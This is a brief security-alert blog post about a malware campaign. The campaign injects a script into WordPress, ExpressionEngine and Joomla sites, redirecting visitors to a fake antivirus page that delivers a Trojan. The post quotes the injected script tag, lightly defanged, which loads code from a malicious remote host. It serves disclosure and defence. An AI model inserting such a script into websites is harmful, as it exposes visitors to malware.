Majority of the sites that have been compromised are running on the popular WordPress blogging platform; however, after a little digging we found that ExpressionEngine and Joomla sites are also being targeted.
According to Websense, the following malicious code is being injected at the bottom of pages, right before the closing body tag (minus the spaces):
< sc ript src=”hxxp://ionis90landsi.rr.nu/mm.php ?d=1 “>
Once a user attempts to visit a website that’s been compromised, their browser is redirected multiple times before ultimately landing on a fake antivirus software webpage resembling a Windows Explorer window that pretends to scan the visitor’s computer and detect multiple malware infections.
“The fake antivirus then prompts visitors to download and run their ‘antivirus tool’ to remove the supposedly found Trojans,” Websense explained in a blog post, “The executable is itself the Trojan.”
The initial link that’s being injected into websites is an “.rr.nu” domain and the landing page is a “.de.lv” domain; however, the landing page keeps changing.
Website owners are advised to do their best to protect their sites by using strong FTP credentials and researching known vulnerabilities within their selected CMS and related plug-ins and/or extensions.
You can check if your website has been compromised by using online scanners like Sucuri’s SiteCheck Scanner.
Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet, “Like” us on Facebook or add us to your circle on Google+.